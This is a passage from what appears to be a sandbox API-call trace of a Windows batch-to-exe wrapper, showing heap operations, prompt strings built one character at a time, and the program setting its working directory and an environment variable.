0x24177e0 [0082.813] GetLastError () returned 0x0 [0082.813] SetLastError (dwErrCode=0x0) [0082.814] GetLastError () returned 0x0 [0082.814] SetLastError (dwErrCode=0x0) [0082.814] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24177c8, Size=0xc) returned 0x2417840 [0082.814] GetLastError () returned 0x0 [0082.814] SetLastError (dwErrCode=0x0) [0082.814] wcslen (_String="Sel") returned 0x3 [0082.814] wcslen (_String="e") returned 0x1 [0082.814] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24177e0, Size=0x12) returned 0x2417dd0 [0082.814] GetLastError () returned 0x0 [0082.814] SetLastError (dwErrCode=0x0) [0082.814] GetLastError () returned 0x0 [0082.814] SetLastError (dwErrCode=0x0) [0082.815] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417840, Size=0xc) returned 0x24176f0 [0082.815] GetLastError () returned 0x0 [0082.815] SetLastError (dwErrCode=0x0) [0082.815] wcslen (_String="Sele") returned 0x4 [0082.815] wcslen (_String="c") returned 0x1 [0082.815] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417dd0, Size=0x14) returned 0x2417df0 [0082.815] GetLastError () returned 0x0 [0082.815] SetLastError (dwErrCode=0x0) [0082.815] GetLastError () returned 0x0 [0082.815] SetLastError (dwErrCode=0x0) [0082.815] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24176f0, Size=0xc) returned 0x2417738 [0082.815] GetLastError () returned 0x0 [0082.815] SetLastError (dwErrCode=0x0) [0082.816] wcslen (_String="Selec") returned 0x5 [0082.816] wcslen (_String="t") returned 0x1 [0082.816] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417df0, Size=0x16) returned 0x2417f50 [0082.816] GetLastError () returned 0x0 [0082.816] SetLastError (dwErrCode=0x0) [0082.816] GetLastError () returned 0x0 [0082.816] SetLastError (dwErrCode=0x0) [0082.816] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417738, Size=0xc) returned 0x24177c8 [0082.816] GetLastError () returned 0x0 [0082.816] SetLastError (dwErrCode=0x0) [0082.816] wcslen (_String="Select") returned 0x6 [0082.817] wcslen (_String=" ") returned 0x1 [0082.817] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417f50, Size=0x18) returned 0x2417f30 [0082.817] GetLastError () returned 0x0 [0082.817] SetLastError (dwErrCode=0x0) [0082.817] GetLastError () returned 0x0 [0082.817] SetLastError (dwErrCode=0x0) [0082.817] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24177c8, Size=0xc) returned 0x2417750 [0082.817] GetLastError () returned 0x0 [0082.817] SetLastError (dwErrCode=0x0) [0082.817] wcslen (_String="Select ") returned 0x7 [0082.817] wcslen (_String="t") returned 0x1 [0082.818] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417f30, Size=0x1a) returned 0x2418be8 [0082.818] GetLastError () returned 0x0 [0082.818] SetLastError (dwErrCode=0x0) [0082.818] GetLastError () returned 0x0 [0082.818] SetLastError (dwErrCode=0x0) [0082.818] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417750, Size=0xc) returned 0x24176f0 [0082.818] GetLastError () returned 0x0 [0082.819] SetLastError (dwErrCode=0x0) [0082.819] wcslen (_String="Select t") returned 0x8 [0082.819] wcslen (_String="h") returned 0x1 [0082.819] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418be8, Size=0x1c) returned 0x2418d50 [0082.819] GetLastError () returned 0x0 [0082.820] SetLastError (dwErrCode=0x0) [0082.820] GetLastError () returned 0x0 [0082.820] SetLastError (dwErrCode=0x0) [0082.820] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24176f0, Size=0xc) returned 0x24177e0 [0082.820] GetLastError () returned 0x0 [0082.820] SetLastError (dwErrCode=0x0) [0082.820] wcslen (_String="Select th") returned 0x9 [0082.820] wcslen (_String="e") returned 0x1 [0082.820] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418d50, Size=0x1e) returned 0x2418eb8 [0082.820] GetLastError () returned 0x0 [0082.820] SetLastError (dwErrCode=0x0) [0082.820] GetLastError () returned 0x0 [0082.820] SetLastError (dwErrCode=0x0) [0082.821] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24177e0, Size=0xc) returned 0x2417810 [0082.821] GetLastError () returned 0x0 [0082.821] SetLastError (dwErrCode=0x0) [0082.821] wcslen (_String="Select the") returned 0xa [0082.821] wcslen (_String=" ") returned 0x1 [0082.821] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418eb8, Size=0x20) returned 0x2418b70 [0082.821] GetLastError () returned 0x0 [0082.821] SetLastError (dwErrCode=0x0) [0082.821] GetLastError () returned 0x0 [0082.821] SetLastError (dwErrCode=0x0) [0082.821] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417810, Size=0xc) returned 0x24176d8 [0082.821] GetLastError () returned 0x0 [0082.821] SetLastError (dwErrCode=0x0) [0082.821] wcslen (_String="Select the ") returned 0xb [0082.821] wcslen (_String="w") returned 0x1 [0082.821] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418b70, Size=0x22) returned 0x2418f00 [0082.821] GetLastError () returned 0x0 [0082.821] SetLastError (dwErrCode=0x0) [0082.821] GetLastError () returned 0x0 [0082.822] SetLastError (dwErrCode=0x0) [0082.822] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24176d8, Size=0xc) returned 0x24177f8 [0082.822] GetLastError () returned 0x0 [0082.822] SetLastError (dwErrCode=0x0) [0082.822] wcslen (_String="Select the w") returned 0xc [0082.822] wcslen (_String="o") returned 0x1 [0082.822] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418f00, Size=0x24) returned 0x2418f00 [0082.822] GetLastError () returned 0x0 [0082.822] SetLastError (dwErrCode=0x0) [0082.822] GetLastError () returned 0x0 [0082.822] SetLastError (dwErrCode=0x0) [0082.822] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24177f8, Size=0xc) returned 0x2417768 [0082.822] GetLastError () returned 0x0 [0082.822] SetLastError (dwErrCode=0x0) [0082.822] wcslen (_String="Select the wo") returned 0xd [0082.822] wcslen (_String="r") returned 0x1 [0082.823] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418f00, Size=0x26) returned 0x2418f00 [0082.823] GetLastError () returned 0x0 [0082.823] SetLastError (dwErrCode=0x0) [0082.823] GetLastError () returned 0x0 [0082.823] SetLastError (dwErrCode=0x0) [0082.823] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417768, Size=0xc) returned 0x2417810 [0082.823] GetLastError () returned 0x0 [0082.823] SetLastError (dwErrCode=0x0) [0082.823] wcslen (_String="Select the wor") returned 0xe [0082.823] wcslen (_String="k") returned 0x1 [0082.823] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418f00, Size=0x28) returned 0x2418f00 [0082.823] GetLastError () returned 0x0 [0082.823] SetLastError (dwErrCode=0x0) [0082.823] GetLastError () returned 0x0 [0082.824] SetLastError (dwErrCode=0x0) [0082.824] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417810, Size=0xc) returned 0x2417768 [0082.824] GetLastError () returned 0x0 [0082.824] SetLastError (dwErrCode=0x0) [0082.824] wcslen (_String="Select the work") returned 0xf [0082.824] wcslen (_String="i") returned 0x1 [0082.824] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418f00, Size=0x2a) returned 0x2418f00 [0082.824] GetLastError () returned 0x0 [0082.824] SetLastError (dwErrCode=0x0) [0082.824] GetLastError () returned 0x0 [0082.824] SetLastError (dwErrCode=0x0) [0082.824] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417768, Size=0xc) returned 0x24177f8 [0082.824] GetLastError () returned 0x0 [0082.825] SetLastError (dwErrCode=0x0) [0082.825] wcslen (_String="Select the worki") returned 0x10 [0082.825] wcslen (_String="n") returned 0x1 [0082.825] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418f00, Size=0x2c) returned 0x2418f00 [0082.825] GetLastError () returned 0x0 [0082.825] SetLastError (dwErrCode=0x0) [0082.825] GetLastError () returned 0x0 [0082.825] SetLastError (dwErrCode=0x0) [0082.825] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24177f8, Size=0xc) returned 0x24176d8 [0082.825] GetLastError () returned 0x0 [0082.825] SetLastError (dwErrCode=0x0) [0082.825] wcslen (_String="Select the workin") returned 0x11 [0082.825] wcslen (_String="g") returned 0x1 [0082.826] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418f00, Size=0x2e) returned 0x2418f00 [0082.826] GetLastError () returned 0x0 [0082.826] SetLastError (dwErrCode=0x0) [0082.826] GetLastError () returned 0x0 [0082.826] SetLastError (dwErrCode=0x0) [0082.826] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24176d8, Size=0xc) returned 0x2417768 [0082.826] GetLastError () returned 0x0 [0082.826] SetLastError (dwErrCode=0x0) [0082.826] wcslen (_String="Select the working") returned 0x12 [0082.826] wcslen (_String=" ") returned 0x1 [0082.826] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418f00, Size=0x30) returned 0x2418f00 [0082.826] GetLastError () returned 0x0 [0082.826] SetLastError (dwErrCode=0x0) [0082.826] GetLastError () returned 0x0 [0082.827] SetLastError (dwErrCode=0x0) [0082.827] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417768, Size=0xc) returned 0x24176d8 [0082.827] GetLastError () returned 0x0 [0082.827] SetLastError (dwErrCode=0x0) [0082.827] wcslen (_String="Select the working ") returned 0x13 [0082.827] wcslen (_String="d") returned 0x1 [0082.827] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418f00, Size=0x32) returned 0x2418f00 [0082.827] GetLastError () returned 0x0 [0082.827] SetLastError (dwErrCode=0x0) [0082.827] GetLastError () returned 0x0 [0082.827] SetLastError (dwErrCode=0x0) [0082.827] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24176d8, Size=0xc) returned 0x2417870 [0082.827] GetLastError () returned 0x0 [0082.828] SetLastError (dwErrCode=0x0) [0082.828] wcslen (_String="Select the working d") returned 0x14 [0082.828] wcslen (_String="i") returned 0x1 [0082.828] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418f00, Size=0x34) returned 0x2418f00 [0082.828] GetLastError () returned 0x0 [0082.828] SetLastError (dwErrCode=0x0) [0082.828] GetLastError () returned 0x0 [0082.828] SetLastError (dwErrCode=0x0) [0082.828] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417870, Size=0xc) returned 0x2417828 [0082.828] GetLastError () returned 0x0 [0082.828] SetLastError (dwErrCode=0x0) [0082.828] wcslen (_String="Select the working di") returned 0x15 [0082.829] wcslen (_String="r") returned 0x1 [0082.829] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418f00, Size=0x36) returned 0x2418f00 [0082.829] GetLastError () returned 0x0 [0082.829] SetLastError (dwErrCode=0x0) [0082.829] GetLastError () returned 0x0 [0082.829] SetLastError (dwErrCode=0x0) [0082.829] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417828, Size=0xc) returned 0x2417708 [0082.829] GetLastError () returned 0x0 [0082.829] SetLastError (dwErrCode=0x0) [0082.829] wcslen (_String="Select the working dir") returned 0x16 [0082.829] wcslen (_String="e") returned 0x1 [0082.829] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418f00, Size=0x38) returned 0x2418f00 [0082.829] GetLastError () returned 0x0 [0082.830] SetLastError (dwErrCode=0x0) [0082.830] GetLastError () returned 0x0 [0082.830] SetLastError (dwErrCode=0x0) [0082.830] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417708, Size=0xc) returned 0x2417768 [0082.830] GetLastError () returned 0x0 [0082.830] SetLastError (dwErrCode=0x0) [0082.830] wcslen (_String="Select the working dire") returned 0x17 [0082.830] wcslen (_String="c") returned 0x1 [0082.830] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418f00, Size=0x3a) returned 0x2418f00 [0082.830] GetLastError () returned 0x0 [0082.830] SetLastError (dwErrCode=0x0) [0082.830] GetLastError () returned 0x0 [0082.830] SetLastError (dwErrCode=0x0) [0082.830] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417768, Size=0xc) returned 0x2417798 [0082.830] GetLastError () returned 0x0 [0082.831] SetLastError (dwErrCode=0x0) [0082.831] wcslen (_String="Select the working direc") returned 0x18 [0082.831] wcslen (_String="t") returned 0x1 [0082.831] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418f00, Size=0x3c) returned 0x2418f00 [0082.831] GetLastError () returned 0x0 [0082.831] SetLastError (dwErrCode=0x0) [0082.831] GetLastError () returned 0x0 [0082.831] SetLastError (dwErrCode=0x0) [0082.831] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417798, Size=0xc) returned 0x24177f8 [0082.831] GetLastError () returned 0x0 [0082.831] SetLastError (dwErrCode=0x0) [0082.831] wcslen (_String="Select the working direct") returned 0x19 [0082.831] wcslen (_String="o") returned 0x1 [0082.831] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418f00, Size=0x3e) returned 0x2418f00 [0082.832] GetLastError () returned 0x0 [0082.832] SetLastError (dwErrCode=0x0) [0082.832] GetLastError () returned 0x0 [0082.832] SetLastError (dwErrCode=0x0) [0082.832] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24177f8, Size=0xc) returned 0x2417780 [0082.832] GetLastError () returned 0x0 [0082.832] SetLastError (dwErrCode=0x0) [0082.832] wcslen (_String="Select the working directo") returned 0x1a [0082.832] wcslen (_String="r") returned 0x1 [0082.832] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418f00, Size=0x40) returned 0x2418f00 [0082.832] GetLastError () returned 0x0 [0082.832] SetLastError (dwErrCode=0x0) [0082.832] GetLastError () returned 0x0 [0082.833] SetLastError (dwErrCode=0x0) [0082.833] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417780, Size=0xc) returned 0x2417750 [0082.833] GetLastError () returned 0x0 [0082.833] SetLastError (dwErrCode=0x0) [0082.833] wcslen (_String="Select the working director") returned 0x1b [0082.880] wcslen (_String="y") returned 0x1 [0082.880] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418f00, Size=0x42) returned 0x2418f00 [0082.880] GetLastError () returned 0x0 [0082.883] SetLastError (dwErrCode=0x0) [0082.883] GetLastError () returned 0x0 [0082.883] SetLastError (dwErrCode=0x0) [0082.883] wcslen (_String="Select the working directory") returned 0x1c [0082.883] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x42) returned 0x2418f50 [0082.883] GetLastError () returned 0x0 [0082.883] SetLastError (dwErrCode=0x0) [0082.883] GetLastError () returned 0x0 [0082.883] SetLastError (dwErrCode=0x0) [0082.884] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2410608 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0082.884] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x3a) returned 0x2418fa0 [0082.884] GetLastError () returned 0x0 [0082.884] SetLastError (dwErrCode=0x0) [0082.884] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\") returned 0x18 [0082.884] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2418fa0 | out: hHeap=0x2410000) returned 1 [0082.884] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2418f50 | out: hHeap=0x2410000) returned 1 [0082.884] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x3a) returned 0x2419320 [0082.884] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0082.884] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2418f00 | out: hHeap=0x2410000) returned 1 [0082.884] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2417750 | out: hHeap=0x2410000) returned 1 [0082.885] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2419320 | out: hHeap=0x2410000) returned 1 [0082.885] GetLastError () returned 0x0 [0082.885] SetLastError (dwErrCode=0x0) [0082.885] GetLastError () returned 0x0 [0082.885] SetLastError (dwErrCode=0x0) [0082.885] wcslen (_String="Select the extraction path") returned 0x1a [0082.885] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x3e) returned 0x2419518 [0082.885] GetLastError () returned 0x0 [0082.885] SetLastError (dwErrCode=0x0) [0082.885] GetLastError () returned 0x0 [0082.885] SetLastError (dwErrCode=0x0) [0082.885] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2410608 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0082.885] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x3a) returned 0x2419710 [0082.885] GetLastError () returned 0x0 [0082.885] SetLastError (dwErrCode=0x0) [0082.885] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\") returned 0x18 [0082.885] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2419710 | out: hHeap=0x2410000) returned 1 [0082.885] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2419518 | out: hHeap=0x2410000) returned 1 [0082.885] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x3a) returned 0x2419098 [0082.885] PathRemoveBackslashW (in: pszPath="C:\\Users\\FD1HVy\\Desktop\\" | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned="" [0082.886] GetLastError () returned 0x0 [0082.886] SetLastError (dwErrCode=0x0) [0082.886] GetLastError () returned 0x0 [0082.886] SetLastError (dwErrCode=0x0) [0082.886] GetLastError () returned 0x0 [0082.886] SetLastError (dwErrCode=0x0) [0082.886] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0082.886] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x38) returned 0x2418f00 [0082.886] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x8, Size=0x2710) returned 0x9007c8 [0082.887] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\Desktop", lpszShortPath=0x9007c8, cchBuffer=0x2710 | out: lpszShortPath="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0082.887] GetLastError () returned 0x0 [0082.887] SetLastError (dwErrCode=0x0) [0082.887] GetLastError () returned 0x0 [0082.887] SetLastError (dwErrCode=0x0) [0082.887] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x38) returned 0x2419d00 [0082.887] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9007c8 | out: hHeap=0x900000) returned 1 [0082.887] GetLastError () returned 0x0 [0082.887] SetLastError (dwErrCode=0x0) [0082.887] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0082.887] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2418f00 | out: hHeap=0x2410000) returned 1 [0082.887] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2419d00 | out: hHeap=0x2410000) returned 1 [0082.888] SetEnvironmentVariableW (lpName="b2eincfilepath", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0082.888] GetLastError () returned 0x0 [0082.888] SetLastError (dwErrCode=0x0) [0082.888] GetLastError () returned 0x0 [0082.888] SetLastError (dwErrCode=0x0) [0082.888] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\") returned 0x35 [0082.888] wcslen (_String="extd.exe") returned 0x8 [0082.888] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2410528, Size=0x84) returned 0x2419f60 [0082.888] GetLastError () returned 0x0 [0082.888] SetLastError (dwErrCode=0x0) [0082.888] GetLastError () returned 0x0 [0082.888] SetLastError (dwErrCode=0x0) [0082.889] GetLastError () returned 0x0 [0082.889] SetLastError (dwErrCode=0x0) [0082.889] GetLastError () returned 0x0 [0082.889] SetLastError (dwErrCode=0x0) [0082.889] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x2410608, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe")) returned 0x4d [0082.889] wcscmp (_String1="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", _String2="\\\\?\\") returned -1 [0082.889] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xa4) returned 0x2419ff0 [0082.889] PathQuoteSpacesW (in: lpsz="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe" | out: lpsz="\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\"") returned 1 [0082.889] GetLastError () returned 0x0 [0082.889] SetLastError (dwErrCode=0x0) [0082.889] wcslen (_String="\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\"") returned 0x4f [0082.889] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xa8) returned 0x241a0a0 [0082.889] GetLastError () returned 0x0 [0082.889] SetLastError (dwErrCode=0x0) [0082.889] wcslen (_String="\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\"") returned 0x4f [0082.889] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2419ff0 | out: hHeap=0x2410000) returned 1 [0082.889] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x241a0a0 | out: hHeap=0x2410000) returned 1 [0082.889] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xa8) returned 0x2419ff0 [0082.890] GetLastError () returned 0x0 [0082.890] SetLastError (dwErrCode=0x0) [0082.890] GetLastError () returned 0x0 [0082.890] SetLastError (dwErrCode=0x0) [0082.890] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x2417750 [0082.890] GetLastError () returned 0x0 [0082.890] SetLastError (dwErrCode=0x0) [0082.890] wcslen (_String="@") returned 0x1 [0082.890] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x24176d8 [0082.890] GetLastError () returned 0x0 [0082.890] SetLastError (dwErrCode=0x0) [0082.890] GetLastError () returned 0x0 [0082.890] SetLastError (dwErrCode=0x0) [0082.890] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417750, Size=0xc) returned 0x2417768 [0082.890] GetLastError () returned 0x0 [0082.890] SetLastError (dwErrCode=0x0) [0082.890] wcslen (_String="@") returned 0x1 [0082.890] wcslen (_String="s") returned 0x1 [0082.890] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24176d8, Size=0xe) returned 0x2417720 [0082.890] GetLastError () returned 0x0 [0082.890] SetLastError (dwErrCode=0x0) [0082.890] GetLastError () returned 0x0 [0082.890] SetLastError (dwErrCode=0x0) [0082.890] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417768, Size=0xc) returned 0x2417858 [0082.891] GetLastError () returned 0x0 [0082.891] SetLastError (dwErrCode=0x0) [0082.891] wcslen (_String="@s") returned 0x2 [0082.891] wcslen (_String="h") returned 0x1 [0082.891] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417720, Size=0x10) returned 0x2417780 [0082.891] GetLastError () returned 0x0 [0082.891] SetLastError (dwErrCode=0x0) [0082.891] GetLastError () returned 0x0 [0082.891] SetLastError (dwErrCode=0x0) [0082.891] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417858, Size=0xc) returned 0x2417708 [0082.891] GetLastError () returned 0x0 [0082.891] SetLastError (dwErrCode=0x0) [0082.891] wcslen (_String="@sh") returned 0x3 [0082.891] wcslen (_String="i") returned 0x1 [0082.891] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417780, Size=0x12) returned 0x2417ff0 [0082.891] GetLastError () returned 0x0 [0082.891] SetLastError (dwErrCode=0x0) [0082.891] GetLastError () returned 0x0 [0082.891] SetLastError (dwErrCode=0x0) [0082.891] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417708, Size=0xc) returned 0x2417768 [0082.891] GetLastError () returned 0x0 [0082.891] SetLastError (dwErrCode=0x0) [0082.891] wcslen (_String="@shi") returned 0x4 [0082.892] wcslen (_String="f") returned 0x1 [0082.892] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417ff0, Size=0x14) returned 0x2417e70 [0082.892] GetLastError () returned 0x0 [0082.892] SetLastError (dwErrCode=0x0) [0082.892] GetLastError () returned 0x0 [0082.892] SetLastError (dwErrCode=0x0) [0082.892] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417768, Size=0xc) returned 0x2417750 [0082.892] GetLastError () returned 0x0 [0082.892] SetLastError (dwErrCode=0x0) [0082.892] wcslen (_String="@shif") returned 0x5 [0082.892] wcslen (_String="t") returned 0x1 [0082.892] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417e70, Size=0x16) returned 0x2418010 [0082.892] GetLastError () returned 0x0 [0082.892] SetLastError (dwErrCode=0x0) [0082.892] GetLastError () returned 0x0 [0082.892] SetLastError (dwErrCode=0x0) [0082.892] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417750, Size=0xc) returned 0x2417828 [0082.892] GetLastError () returned 0x0 [0082.892] SetLastError (dwErrCode=0x0) [0082.892] wcslen (_String="@shift") returned 0x6 [0082.893] wcslen (_String=" ") returned 0x1 [0082.893] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418010, Size=0x18) returned 0x2417cf0 [0082.893] GetLastError () returned 0x0 [0082.893] SetLastError (dwErrCode=0x0) [0082.893] GetLastError () returned 0x0 [0082.893] SetLastError (dwErrCode=0x0) [0082.893] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417828, Size=0xc) returned 0x24177c8 [0082.893] GetLastError () returned 0x0 [0082.893] SetLastError (dwErrCode=0x0) [0082.893] wcslen (_String="@shift ") returned 0x7 [0082.893] wcslen (_String="/") returned 0x1 [0082.893] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417cf0, Size=0x1a) returned 0x2418b48 [0082.893] GetLastError () returned 0x0 [0082.893] SetLastError (dwErrCode=0x0) [0082.893] GetLastError () returned 0x0 [0082.893] SetLastError (dwErrCode=0x0) [0082.893] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24177c8, Size=0xc) returned 0x2417738 [0082.894] GetLastError () returned 0x0 [0082.894] SetLastError (dwErrCode=0x0) [0082.894] wcslen (_String="@shift /") returned 0x8 [0082.894] wcslen (_String="0") returned 0x1 [0082.894] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418b48, Size=0x1c) returned 0x2418da0 [0082.894] GetLastError () returned 0x0 [0082.894] SetLastError (dwErrCode=0x0) [0082.894] GetLastError () returned 0x0 [0082.894] SetLastError (dwErrCode=0x0) [0082.894] GetLastError () returned 0x0 [0082.894] SetLastError (dwErrCode=0x0) [0082.894] GetLastError () returned 0x0 [0082.894] SetLastError (dwErrCode=0x0) [0082.894] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x9c) returned 0x22b10b0 [0082.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="078EFDA905BE29D2B2220056D808BDE2", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0082.894] malloc (_Size=0x22) returned 0x9b1150 [0082.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="078EFDA905BE29D2B2220056D808BDE2", cchWideChar=33, lpMultiByteStr=0x9b1150, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="078EFDA905BE29D2B2220056D808BDE2", lpUsedDefaultChar=0x0) returned 33 [0082.895] free (_Block=0x9b1150) [0082.895] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10b0 | out: hHeap=0x22b0000) returned 1 [0082.895] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, 